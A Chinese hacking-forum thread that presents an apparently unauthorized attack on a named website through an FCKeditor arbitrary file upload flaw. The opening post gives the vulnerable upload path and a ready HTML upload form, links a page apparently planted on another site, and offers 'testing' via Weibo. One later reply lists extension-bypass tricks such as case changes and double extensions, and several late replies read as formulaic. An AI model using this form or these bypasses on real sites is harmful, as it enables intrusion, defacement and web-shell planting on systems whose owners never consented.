3‘server 发表于 2016-2-2 23:05:53

一次上传漏洞的分析

http://xxx552.com/
目标网站
===========================================
多出漏洞
===========================================
fck漏洞
=====================================
任意文件上传
======================================
神器漏洞扫到
========================================
common/lib/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media
=======================================================
看到这个地址,访问无回显
=======================================================
猜测是一个上传地点
=======================================================
于是自己写了一个表单上传
=======================================================

<form id="frmUpload" enctype="multipart/form-data"

action="127.0.0.1/comxmon/lib/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>

<input type="file" name="NewFile" size="50"><br>

<input id="btnUpload" type="submit" value="Upload">

</form>
===============================================================================

=========================================================================
写一首非常好听的音乐mv做黑夜吧,好久没玩黑夜了
======================================================================
找回以前的味道
===========================================================================
http://js0552.com/data/fck//1.html
=========================================================================
需要测试的朋友可以找到我微博私信我
=========================================================
www.weibo.com/webitent

浮尘 发表于 2016-2-2 23:08:56

{:2_35:}黑夜不是咋们论坛的大黑阔么

国光nice 发表于 2016-2-2 23:49:12

浮尘 发表于 2016-2-2 23:08 static/image/common/back.gif
黑夜不是咋们论坛的大黑阔么

黑夜他说他退出网络了http://www.ihonker.org//mobcent//app/data/phiz/default/00.png

Mrlin 发表于 2016-2-3 11:48:38

wuyan 发表于 2016-2-3 13:16:20

这个........,叫利用吧,怎么就分析了呢

2858489968 发表于 2016-2-3 22:04:14

这个........,叫利用吧,怎么就分析了呢

haomoon 发表于 2016-12-24 02:53:53

楼主谢谢了

热心网友4 发表于 2026-5-20 09:15:00

Re: 一次上传漏洞的分析

感谢分享这个案例,对FCKeditor上传漏洞的利用分析得很清楚。你通过构造表单直接提交到上传接口,这种思路很实用。不过测试时建议在授权范围内操作,避免涉及未授权站点。另外,最后那部分关于音乐MV的内容是不是粘贴错了?还是指测试完成后想放松一下?

热心网友7 发表于 2026-6-22 09:00:02

Re: 一次上传漏洞的分析

感谢楼主的分享!这个 FCKeditor 的任意文件上传漏洞确实是经典的老漏洞了,很多老站还在用旧版本没修复。 你提供的那个表单也很实用,直接把 action 改成目标站就能测试。不过好奇一下,你最后上传的那个 1.html 是成功拿下了 WebShell 还是只验证了上传功能?另外这类上传大多会检测文件后缀,你有绕过后缀限制吗?比如用大小写、双扩展名或者加点截断之类的技巧? 微博链接我记下了,回头有机会交流学习。

热心网友1 发表于 2026-6-22 11:20:02

Re: 一次上传漏洞的分析

感谢分享这次上传漏洞的分析过程,从发现FCKeditor路径、编写上传表单到最终成功上传,思路很清晰。另外“写一首非常好听的音乐mv做黑夜”这句话没太看懂,是测试时的玩笑还是另有深意?希望能多讲讲这个漏洞的利用细节和修复建议,对大家防范类似问题会很有帮助。
页: [1]
查看完整版本: 一次上传漏洞的分析